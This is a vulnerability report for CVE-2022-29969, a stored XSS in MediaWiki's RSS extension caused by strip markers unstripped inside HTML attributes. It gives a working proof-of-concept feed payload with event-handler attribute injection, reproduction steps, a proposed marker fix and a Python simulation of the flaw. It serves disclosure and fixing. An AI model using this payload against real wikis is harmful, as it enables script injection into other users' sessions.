CVE-2022-29969
This is a WMF-deployed extension; however, $wgRSSAllowLinkTag is false on the cluster, so it is not vulnerable in the configuration WMF uses.
The RSS extension's implementation of strip markers suffers from a problem similar to the one MW core had before T110143 was fixed. When $wgRSSAllowLinkTag is set to true, the marker standing in for an <a> tag can be placed inside an HTML attribute value; the attribute is sanitized with the harmless marker in place, and when the raw link is substituted back afterwards it breaks out of that attribute.
As an example:
- Set $wgRSSAllowLinkTag = true;
- Create an RSS feed as follows:
  <?xml version="1.0" encoding="UTF-8"?>
  <rss version="2.0">
    <channel>
      <title>Test</title>
      <item>
        <title>First item</title>
        <link>https://example.com</link>
        <description><![CDATA[<a title="tabindex=1 autofocus onmouseover=alert(1) onfocus=blur() onblur=alert(document.domain)//"> Should autotrigger on chrome, and trigger on hover on firefox</a> ]]></description>
      </item>
    </channel>
  </rss>
- Be sure the above RSS feed is added to $wgRSSUrlWhitelist
- Create a template named Template:RSS containing only
  <div title="{{{description}}}"></div>
- Use the following tag on a page: <rss templatename=RSS>http://address.of.rss.feed.from.above</rss>
This should produce an XSS that triggers automatically on Chrome (the autofocus, blur() and onblur chain) and on hover in Firefox: the first " in the raw <a> tag closes the div's title attribute, and the remaining text is parsed as attributes of the div.
The best fix is probably to copy what MW core does for its strip markers and include the characters "' in the marker itself. A marker that lands inside an attribute value is then altered by attribute escaping, no longer matches the marker table, and is not unstripped there, so the raw link never ends up inside the attribute.
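To make the mechanism and the proposed fix concrete, here is an added Python simulation of the strip/unstrip round trip. It is not code from the RSS extension or from MediaWiki core: the marker strings, the function names, the regex link stripper and the use of html.escape in place of the core Sanitizer are all assumptions standing in for the real pipeline, and the feed description is the payload from the report above.

```python
import html
import re

# Constructed input: the <description> payload from the report's feed.
DESCRIPTION = (
    '<a title="tabindex=1 autofocus onmouseover=alert(1) onfocus=blur() '
    'onblur=alert(document.domain)//">hover me</a>'
)

# Assumed marker formats. The naive marker contains no characters that
# attribute escaping touches; the hardened one carries "' (and a backtick)
# in the spirit of core's markers after T110143.
NAIVE_PREFIX, NAIVE_SUFFIX = "\x7fUNIQ-rss-", "-QINU\x7f"
HARD_PREFIX, HARD_SUFFIX = "\x7f'\"`UNIQ-rss-", "-QINU`\"'\x7f"


def strip_links(text, prefix, suffix):
    """Replace every <a ...>...</a> with an opaque marker.

    Returns the stripped text and a marker -> original HTML table, the way
    a strip-marker scheme defers raw HTML until after parsing/sanitizing.
    """
    table = {}

    def repl(match):
        key = f"{prefix}{len(table)}{suffix}"
        table[key] = match.group(0)
        return key

    return re.sub(r"<a\b[^>]*>.*?</a>", repl, text, flags=re.S), table


def render_template(description):
    """Template:RSS from the report: the description lands in a title
    attribute. Attribute escaping stands in for the core Sanitizer."""
    return '<div title="%s"></div>' % html.escape(description, quote=True)


def unstrip(rendered, table):
    """Put the deferred raw HTML back wherever its marker still appears."""
    for key, raw in table.items():
        rendered = rendered.replace(key, raw)
    return rendered


def pipeline(prefix, suffix, description=DESCRIPTION):
    """Full round trip: strip links, render through the template, unstrip."""
    stripped, table = strip_links(description, prefix, suffix)
    return unstrip(render_template(stripped), table)


def attribute_intact(rendered):
    """True when exactly the two quotes of title="..." survive, i.e. nothing
    raw was reinserted inside the attribute."""
    return rendered.count('"') == 2 and "alert(" not in rendered


if __name__ == "__main__":
    print("naive   :", pipeline(NAIVE_PREFIX, NAIVE_SUFFIX))
    print("hardened:", pipeline(HARD_PREFIX, HARD_SUFFIX))
```

With the naive marker the output is `<div title="<a title="tabindex=1 autofocus ... onblur=alert(document.domain)//">hover me</a>"></div>`, which a browser reads as a div carrying autofocus and the event handlers. With the hardened marker, html.escape turns the `"` and `'` in the marker into entities, `unstrip` finds no match, and the div's title attribute simply contains the escaped marker text. A leftover marker is ugly but harmless, which is the trade-off core accepts.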